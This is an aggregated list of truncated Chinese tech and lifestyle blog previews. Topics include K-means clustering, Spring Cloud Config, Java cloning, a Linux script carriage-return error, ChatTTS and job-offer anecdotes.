K-means聚类是一种无监督的机器学习算法&#xff0c;用于将数据点划分到K个不同的簇中。这种算法的目标是最小化簇内的方差&#xff0c;即使得每个簇内的数据点与簇中心的距离尽可能小。以下是K-means聚类模型的主要步骤和特点&#xff1a; 主要步骤&#xff1a; 1. 选择K值&…

深入解析Spring Cloud Config:构建高可用分布式配置中心

在微服务架构中&#xff0c;配置管理是一个关键问题。Spring Cloud Config提供了一种解决方案&#xff0c;它是一个高可用、分布式的外部配置中心。本文将深入探讨Spring Cloud Config的原理、架构及其在实际项目中的应用&#xff0c;帮助读者掌握如何构建一个高效、可靠的分布…

SD NAND(贴片式TF卡)在储能领域的应用

储能系统&#xff08;Energy Storage System&#xff0c;简称ESS&#xff09;是指能将电能以化学能、势能、动能等形式储存起来&#xff0c;并在需要时将其转化为电能供应给用户的设备。主要由电池管理系统&#xff08;BMS&#xff09;、能量管理系统&#xff08;EMS&#xff0…

拿到Offer了才知道,这家公司年终奖只有几百块~

我也挠头了 最近又有不少粉丝上岸了&#xff0c;其中一位分享的事情比较有意思&#xff0c;和你分享一下&#xff1a; 以后你对比Offer的时候也可以多个经验。 事情是这样的&#xff1a; 他在经过2个多月空窗期之后终于拿到了Offer&#xff0c;月薪涨幅不大&#xff0c;但是…

java的clone

一、clone的用法&#xff1a; package chatRoom.F5;class Person implements Cloneable{//1.public String name;public Person(String name) {this.name name;}//2.protected Person clone() throws CloneNotSupportedException {return (Person)super.clone();//重写Object…

linux脚本执行报错|syntax error near unexpected token `$‘do\r‘‘

一、问题 在Window上用记事本txt写了个linux脚本&#xff0c;放到Linux上去执行报错|syntax error near unexpected token $‘do\r‘‘ 二、可通过vim的-b命令查询脚本&#xff08;-b表示二进制模式&#xff09; vim -b youtest.sh 发现&#xff0c;sh脚本后面多了^M 三、…

媒体有入口,发稿有入口 是什么意思?

传媒如春雨&#xff0c;润物细无声&#xff0c;大家好&#xff0c;我是51媒体网胡老师。 媒体有入口&#xff0c;发稿有入口是指在新闻媒体发稿时&#xff0c;稿件可以通过一定的路径被访问和浏览。具体来说&#xff0c;有入口的新闻稿件可以通过点击链接&#xff0c;逐步深入…

芯片验证分享1 —— 开篇及名词解释

大家好&#xff0c;我是谷公子的藏经阁&#xff0c;今天和大家很高兴能和大家分享的是芯片验证中的一些内容&#xff0c;希望对大家的日常工作有所帮助&#xff0c;如果这些内容有帮助到大家的话&#xff0c;那么此次的分享就很值得。另外&#xff0c;对于这个课题&#xff0c;…

揭开旅游卡项目!是当下趋势风潮?来这给你整明白!

旅游卡作为一种旅游产品&#xff0c;近年来在市场上逐渐流行起来。它通常包含一系列旅游服务&#xff0c;如门票、住宿、餐饮、交通等&#xff0c;旨在为消费者提供一站式的旅游体验。在您所描述的案例中&#xff0c;云南6天五晚游旅游卡以极低的价格吸引消费者&#xff0c;并通…

ChatTTS增强版,增强音质、批量处理、固定音色、支持长文本

大家好&#xff0c;最近ChatTTS文字生成语音项目挺火。只需要输入一段文字&#xff0c;就可以生成一段非常逼真的声音。声音的效果非常不错。它支持英文和中文两种语言。我在原版的基础上做了一些改动&#xff0c;整合包分享给大家。 功能介绍 除了基础的文本生成音频功能以外…